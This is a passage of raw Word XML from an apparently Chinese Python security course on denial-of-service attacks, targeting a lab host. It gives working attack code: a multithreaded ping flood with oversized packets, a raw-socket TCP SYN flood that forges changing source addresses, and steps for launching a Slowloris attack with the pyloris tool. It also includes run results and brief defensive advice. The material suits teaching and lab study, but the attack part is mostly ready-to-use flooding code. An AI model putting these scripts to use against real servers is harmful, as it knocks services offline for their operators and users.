        </w:rPr>
        <w:t>网络中，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90504">
        <w:t>ping命令可发送的数据大小被限制为65500字节。随着系统性能的提升，发动DoS攻击的威力大大减小。但DoS攻击概念刚出现时，它一种是非常强大的攻击手段。使用示例很难获得良好的攻击效果，但足以通过其理解使用ICMP协议发动DoS攻击的工作原理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA87491" w14:textId="7B8C8E54" w:rsidR="009A6074" w:rsidRPr="00CC2F42" w:rsidRDefault="009A6074"/>
    <w:p w14:paraId="5A3D1A6F" w14:textId="26C2E65D" w:rsidR="009A6074" w:rsidRDefault="00BB0B12" w:rsidP="00BB0B12">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137DEB51" w14:textId="77777777" w:rsidR="00BB0B12" w:rsidRPr="00BB0B12" w:rsidRDefault="00BB0B12" w:rsidP="00BB0B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BB0B1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#!/usr/bin/python3</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B12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# -*- encoding: utf-8 -*-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B12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# @Time     : 2020/11/25 11:40 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B12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# @Author   : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB0B1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ordar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB0B12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# @File     : dos_ping.py  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B12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# @Project  : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB0B1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pythonCourse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB0B12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# @Python   : 3.7.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B12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</w:r>
      <w:r w:rsidRPr="00BB0B1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subprocess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BB0B1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threading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BB0B1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time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BB0B12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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB0B12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dos_ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(host</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B1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id):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proofErr w:type="spellStart"/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subprocess.call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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BB0B1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"ping {} -l 65000"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.format(host)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B1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BB0B12">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="AA4926"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>shell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</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B1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True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BB0B12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BB0B1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'subprocess {}'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.format(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B12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str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(id)))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BB0B1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__name__ == </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B1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'__main__'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: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BB0B1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for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B1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in </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B12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range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BB0B12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500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):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proofErr w:type="spellStart"/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new_thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/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threading.Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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BB0B12">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="AA4926"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>target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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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dos_ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB0B1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BB0B12">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="AA4926"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B1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"192.168.181.137"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0B1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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/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new_thread.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/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time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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BB0B12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BB0B1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</w:p>
    <w:p w14:paraId="340E73E4" w14:textId="24A310FC" w:rsidR="009A6074" w:rsidRPr="00AC47CB" w:rsidRDefault="009A6074"/>
    <w:p w14:paraId="1ECF5B55" w14:textId="23A905BB" w:rsidR="00CC2F42" w:rsidRDefault="002F0D3E" w:rsidP="007D2CF8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidR="007D40BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759594D2" w14:textId="3EAE180B" w:rsidR="00021130" w:rsidRDefault="00021130">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37DD348A" wp14:editId="0F80FA2D">
            <wp:extent cx="5274310" cy="24079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B546" w14:textId="4C5352FC" w:rsidR="002F0D3E" w:rsidRDefault="002F0D3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33A373E6" wp14:editId="40210A25">
            <wp:extent cx="5274310" cy="32861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A133" w14:textId="77777777" w:rsidR="002F0D3E" w:rsidRDefault="002F0D3E"/>
    <w:p w14:paraId="6606D6F4" w14:textId="691B58C4" w:rsidR="00CC2F42" w:rsidRDefault="00CC2F42">
      <w:r w:rsidRPr="00CC2F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序运行初期，从客户机</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2F42">
        <w:t>PC到服务器PC的Ping响应性能基本没有变化。但随着线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数量的增加，特别是线程数超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2F42">
        <w:t>100个时，服务器PC的性能下降逐渐明显，导致有些回复的耗时大于10毫秒。若想防范死亡之Ping攻击，需要限制某个时间段内进入的ping个数，或者阻止所有来自外部的ping命令。此外，还要设置防火墙规则，检查ping请求的大小，阻止大于正常大小的ping请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524B199" w14:textId="0BBDF135" w:rsidR="00CC2F42" w:rsidRDefault="00CC2F42"/>
    <w:p w14:paraId="10DB41B1" w14:textId="10DBD056" w:rsidR="00CC2F42" w:rsidRDefault="001032B4" w:rsidP="005068F6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS：</w:t>
      </w:r>
      <w:r w:rsidR="005068F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="005068F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005068F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SYN洪水攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0C268" w14:textId="0B6AC056" w:rsidR="00CC2F42" w:rsidRDefault="00BE45D2">
      <w:r w:rsidRPr="00BE45D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>套接字通信中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE45D2">
        <w:t>IP与TCP头通常由内核自动设置。但若想使用原始套接字仅传送SYN包，则需要程序员亲自创建。要想在Python内部使用C语言功能，需要将其创建为C语言中使用的头文件形式。首先了解IP头文件，其结构如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3EAD7" w14:textId="77777777" w:rsidR="00EB05C8" w:rsidRDefault="00EB05C8" w:rsidP="00EB05C8">
      <w:r>
        <w:t xml:space="preserve">    从Version 到Destination Address总共有20字节。Version填入4代表IPv4，IHL表示整个IP头长度，以32位为单位，表示包含多少个32位。此处填入5表示20字节。Identification填入任意值，Flags与Fragment Offset的值同时设置为0。Time to Live填入255，它是网络支持的最大值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19614DBB" w14:textId="18750E7A" w:rsidR="00EB05C8" w:rsidRDefault="00EB05C8" w:rsidP="00EB05C8">
      <w:r>
        <w:t xml:space="preserve">    Protocol 设置为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket.IPPROTO_TCP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，Total Length与Header Checksum在发送包时由内核设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7590E56D" w14:textId="284A28F8" w:rsidR="00CB1B69" w:rsidRDefault="00BE45D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="401289AF" wp14:editId="7C4C78E5">
            <wp:extent cx="5274310" cy="37814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2F3" w14:textId="5815992C" w:rsidR="00CB1B69" w:rsidRDefault="00EB05C8">
      <w:r w:rsidRPr="00EB05C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB05C8">
        <w:t>TCP头。IP指定地址，TCP指定通信中要使用的端口。TCP包的类型通过Flags值进行设置。SYN洪水攻击中，由于只传送大量SYN包，所以只需将SYN值设置为1，其他全部设置为0。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F4ADDE" w14:textId="1C5F19CA" w:rsidR="00EB05C8" w:rsidRDefault="003F6007">
      <w:r w:rsidRPr="003F6007">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r w:rsidRPr="003F6007">
        <w:t>Source Port输入任意值，向Destination Port输入80，它是要攻击的目标端口。将Sequence Number与Acknowledgment Number也设为任意值。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F6007">
        <w:t>DataOffset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F6007">
        <w:t>表示TCP头结束位置，以32位为单位，设置为5表示头长度为20字节。由于只发送SYN包，所以要将Flags设置为1。Window设置为5840，它是协议允许的最大窗口。Checksum在发送包时由内核自动设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76528B54" w14:textId="2BBBDF8A" w:rsidR="00EB05C8" w:rsidRDefault="00EB05C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="617B6E93" wp14:editId="4E9C1A22">
            <wp:extent cx="5274310" cy="46748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6245" w14:textId="42C1A941" w:rsidR="00EB05C8" w:rsidRDefault="003F6007">
      <w:r w:rsidRPr="003F6007">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若想设置</w:t>
      </w:r>
      <w:r w:rsidRPr="003F6007">
        <w:t>IP头与TCP头，需要将Python中使用的字符变换为C语言的结构体。struct模块提供了pack（)函数，在Python中使用该函数即可轻松完成转换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A86FB08" w14:textId="47592245" w:rsidR="003F6007" w:rsidRDefault="003F6007" w:rsidP="003F6007">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3543A504" w14:textId="7F1E5E12" w:rsidR="00EB05C8" w:rsidRDefault="00EB05C8"/>
    <w:p w14:paraId="515E0DB6" w14:textId="77777777" w:rsidR="00083EE5" w:rsidRPr="00083EE5" w:rsidRDefault="00083EE5" w:rsidP="00083E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#!/usr/bin/python3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# -*- encoding: utf-8 -*-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# @Time     : 2020/11/25 14:49 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# @Author   : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ordar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# @File     : dos_syn_attack.py  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# @Project  : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pythonCourse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# @Python   : 3.7.5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socket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from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struct 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*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1. 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声明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TCP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校验和计算函数：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TCP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校验和用于保证传送数据的完整性，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该函数用于计算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TCP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校验和。计算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TCP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校验和时，先将头与数据以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16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位为单位进行分割，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lastRenderedPageBreak/>
        <w:t xml:space="preserve"># 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再求校验位和，然后按位取反得到校验和。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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083EE5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makeChecksum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(msg):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s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for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in </w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE5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range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len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(msg)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2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):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w = (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083EE5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ord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(msg[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]) &lt;&lt;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8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+ (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083EE5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ord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(msg[i+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]))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s = s + w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s = (s&gt;&gt;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16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+ (s &amp;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0xffff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s = ~s &amp;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0xffff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2. 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声明创建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IP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头函数：如前所述，该函数用于创建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IP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头。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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083EE5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makeIPHeader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sourceIP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destIP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):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version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4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ihl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5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typeOfService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totalLength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 xml:space="preserve">20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+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20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id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999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flagsOffSet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ttl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255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protocol =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socket.IPPROTO_TCP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headerChecksum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sourceAddress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socket.inet_aton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sourceIP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destinationAddress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socket.inet_aton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destIP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ihlVersion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(version &lt;&lt;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4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+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ihl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3. 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创建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IP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头结构体：使用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pack()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函数转换为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C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语言中使用的结构体形式。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pack(</w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE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'!BBHHHBBH4s4s'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ihlVersion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typeOfService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totalLength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id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flagsOffSet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ttl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protocol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headerChecksum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sourceAddress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destinationAddress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4. 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声明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TCP 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头创建函数：如前所述，该函数用于创建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TCP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头。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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083EE5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makeTCPHeader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(port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icheckSum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</w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE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'none'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):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sourcePort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port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destinationAddressPort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80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SeqNumber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AckNumber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dataOffset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5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flagFin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flagSyn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flagRst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flagPsh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lastRenderedPageBreak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flagAck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flagUrg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window =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socket.htons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5840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icheckSum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== </w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE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'none'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: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checksum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else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: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checksum =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icheckSum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urgentPointer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dataOffsetTesv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(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dataOffset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&lt;&lt;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4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+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flags = (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flagUrg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&lt;&lt;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5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+ (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flagAck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&lt;&lt;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4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+ (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flagPsh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&lt;&lt;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3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+ (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flagRst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&lt;&lt;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2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+ (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flagSyn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&lt;&lt;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+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flagFin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5. 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创建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TCP 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头结构体：使用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pack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（）函数转换为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C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语言中使用的结构体形式。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pack(</w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE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"!HHLLBBHHH"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sourcePort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destinationAddressPort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SeqNumber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AckNumber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dataOffsetTesv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flags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window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checksum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urgentPointer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6. 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创建原始套接字：创建原始套接字对象，使用它可以任意创建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IP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头与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TCP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头。使用原始套接字需要拥有管理员权限。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 =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socket.socket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socket.AF_INET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socket.SOCK_RAW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socket.IPPROTO_TCP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7. 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设置套接字选项：设置套接字选项，以便开发人员创建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IP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头。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s.setsockopt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socket.IPPROTO_IP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socket.IP_HDRINCL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8. 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循环语句：使用该循环语句发送大量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SYN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包。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for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j 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in </w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE5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range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20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):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proofErr w:type="spellStart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for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k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in </w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE5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range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255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):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for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l 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in </w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE5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range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255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):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9. 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设置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IP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：设置源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IP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与目的地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IP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。为了方便测试，将源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IP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设置为每次都变化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sourceIP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r w:rsidRPr="00083EE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"192.168.{}.{}"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.format(</w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE5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str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(k)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83EE5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str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(l))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destIP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r w:rsidRPr="00083EE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"192.168.181.137"</w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE5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    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10. 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创建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IP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头：调用相应函数创建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IP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头，并转换为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C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语言结构体形式。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ipHeader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makeIPHeader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sourceIP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destIP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11. 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计算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TCP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校验和：调用相关函数，计算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TCP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校验和。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tcpHeader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makeTCPHeader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10000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+j+k+l)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12. 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转换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IP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结构体：使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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inet_atonO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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函数将字符串数据转换为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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in_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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结构体。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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        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sourceAddr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socket.inet_aton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sourceIP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destAddr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socket.inet_aton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destIP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placeholder =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       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protocol =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socket.IPPROTO_TCP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tcpLen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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00083EE5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len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tcpHeader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psh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pack(</w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE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"!4s4sBBH"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sourceAddr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destAddr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placeholder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protocol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tcpLen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psh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psh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+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tcpHeader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13. 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计算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TCP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校验和：调用相关函数，计算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TCP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校验和。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tcpChecksum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makeChecksum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psh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14. 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创建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TCP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头：设置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TCP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检验和，创建实际用于传送的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TCP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头。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tcpHeader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=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makeTCPHeader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10000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+j+k+l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tcpChecksum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packet =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ipHeader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 +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tcpHeader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15. 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传送包：将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IP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头与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TCP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头封装为</w:t>
      </w:r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TCPSYN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包并传送。建立连接前，可以使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sendto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00083EE5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)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方法从发送方发送数据包。</w:t>
      </w:r>
      <w:r w:rsidRPr="00083EE5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s.sendto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(packet</w:t>
      </w:r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proofErr w:type="spellStart"/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destIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00083EE5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83EE5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</w:t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83EE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</w:p>
    <w:p w14:paraId="4B0BCDA7" w14:textId="1EDD55EA" w:rsidR="00EB05C8" w:rsidRDefault="00EB05C8"/>
    <w:p w14:paraId="2C35A81C" w14:textId="163A6A26" w:rsidR="00EB05C8" w:rsidRDefault="00EB05C8"/>
    <w:p w14:paraId="5A06F870" w14:textId="011B48E1" w:rsidR="0077441C" w:rsidRDefault="0077441C" w:rsidP="007D2CF8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidR="00350CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0202C993" w14:textId="13050239" w:rsidR="00C1366F" w:rsidRDefault="0060105C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行环境：</w:t>
      </w:r>
      <w:r w:rsidR="00C1366F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C1366F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C1366F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中可以正常运行，在Windows系统中会有错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211BC766" w14:textId="74EE824C" w:rsidR="00AF2972" w:rsidRDefault="009765E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在攻击机上</w:t>
      </w:r>
      <w:r w:rsidR="00AF2972">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF2972">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF2972">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包，可以看到大量源地址变化的发送给目标地址的SYN包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E448169" w14:textId="422012C7" w:rsidR="00EB05C8" w:rsidRDefault="00602298">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637D3E26" wp14:editId="04CF32F1">
            <wp:extent cx="5274310" cy="24422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BED9" w14:textId="77777777" w:rsidR="00EB05C8" w:rsidRDefault="00EB05C8"/>
    <w:p w14:paraId="408152A3" w14:textId="085659DC" w:rsidR="00CB1B69" w:rsidRDefault="006D071F" w:rsidP="00796836">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D071F">
        <w:t>Slowloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D071F">
        <w:t xml:space="preserve"> 攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A7E69" w14:textId="17098617" w:rsidR="00CB1B69" w:rsidRDefault="00944F13" w:rsidP="00944F13">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00944F13">
        <w:t>pyloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00944F13">
        <w:t>模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF3E89E" w14:textId="06BB2BE4" w:rsidR="00CB1B69" w:rsidRDefault="00944F13">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00944F13">
        <w:t>Slowloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00944F13">
        <w:t xml:space="preserve"> 攻击最初使用Perl脚本实现。为了探测Web服务器与防火墙漏洞，Python提供了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00944F13">
        <w:t>pyloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00944F13">
        <w:t>模块。首先，进入http://sourceforge.net/projects/pyloris网站下载</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00944F13">
        <w:t>pyloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00944F13">
        <w:t>模块。下载完成后，并不需要特别的安装过程。将下载的文件解压缩，在Windows命令行窗口转到文件所在目录，通过简单命令</w:t>
      </w:r>
      <w:r w:rsidR="00E84549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="00E84549">
        <w:t>2 pyloris.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00944F13">
        <w:t>即可轻松运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201D40A1" w14:textId="2E2205B9" w:rsidR="00CB1B69" w:rsidRDefault="001F5B36" w:rsidP="001F5B36">
      <w:pPr>
        <w:pStyle w:val="3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pyloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10BC21" w14:textId="77777777" w:rsidR="001F5B36" w:rsidRDefault="001F5B36" w:rsidP="001F5B36">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pyloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 提供的UI由General、Behavior、Proxy、Request Body四个区域组成。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Slowloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>攻击中，需要着重观察General、Behavior 两个区域。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E04F3" w14:textId="1B7D2FCC" w:rsidR="001F5B36" w:rsidRDefault="001F5B36" w:rsidP="001F5B36">
      <w:r>
        <w:t xml:space="preserve">    在区域（General)中设置要攻击的服务器与端口。此处将Host设置为server（服务器PC），Port设置为80。在区域（Behavior)中设置用于执行攻击的环境。在区域（Request Body)中显示要发送给目标服务器的HTTP协议内容。所有设置完成后，点击&lt;Launch&gt;按钮，开始发动攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027155FD" w14:textId="49E09247" w:rsidR="00CB1B69" w:rsidRPr="001F5B36" w:rsidRDefault="001F5B36" w:rsidP="001F5B36">
      <w:r>
        <w:t xml:space="preserve">    Behavior中的各设置项如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A81F2B" w14:textId="77777777" w:rsidR="000F2B97" w:rsidRDefault="000F2B97" w:rsidP="000F2B97">
      <w:r>
        <w:t xml:space="preserve">    Attack Limit:设置一个会话中要创建的总连接数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC0811F" w14:textId="77777777" w:rsidR="000F2B97" w:rsidRDefault="000F2B97" w:rsidP="000F2B97">
      <w:r>
        <w:t xml:space="preserve">    Connection Limit:设置一个会话中可以同时使用的总连接数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76266D8E" w14:textId="77777777" w:rsidR="000F2B97" w:rsidRDefault="000F2B97" w:rsidP="000F2B97">
      <w:r>
        <w:t xml:space="preserve">    Thread Limit:设置一个会话中可以运行的总线程数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45E4FC" w14:textId="77777777" w:rsidR="000F2B97" w:rsidRDefault="000F2B97" w:rsidP="000F2B97">
      <w:r>
        <w:t xml:space="preserve">    Connection Speed:设置各连接速度，单位为bytes/second。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE03EA" w14:textId="068D867B" w:rsidR="00CB1B69" w:rsidRDefault="000F2B97" w:rsidP="000F2B97">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Time between thread </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spaws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:设置创建线程时的延迟时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E64CA" w14:textId="367CE687" w:rsidR="000F2B97" w:rsidRPr="000F2B97" w:rsidRDefault="000F2B97" w:rsidP="000F2B97">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="000F2B97">
        <w:t>Time between connections:设置创建套接字连接时的延迟时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDE211" w14:textId="5C85D861" w:rsidR="00CB1B69" w:rsidRDefault="00FD2CFF">
      <w:r>
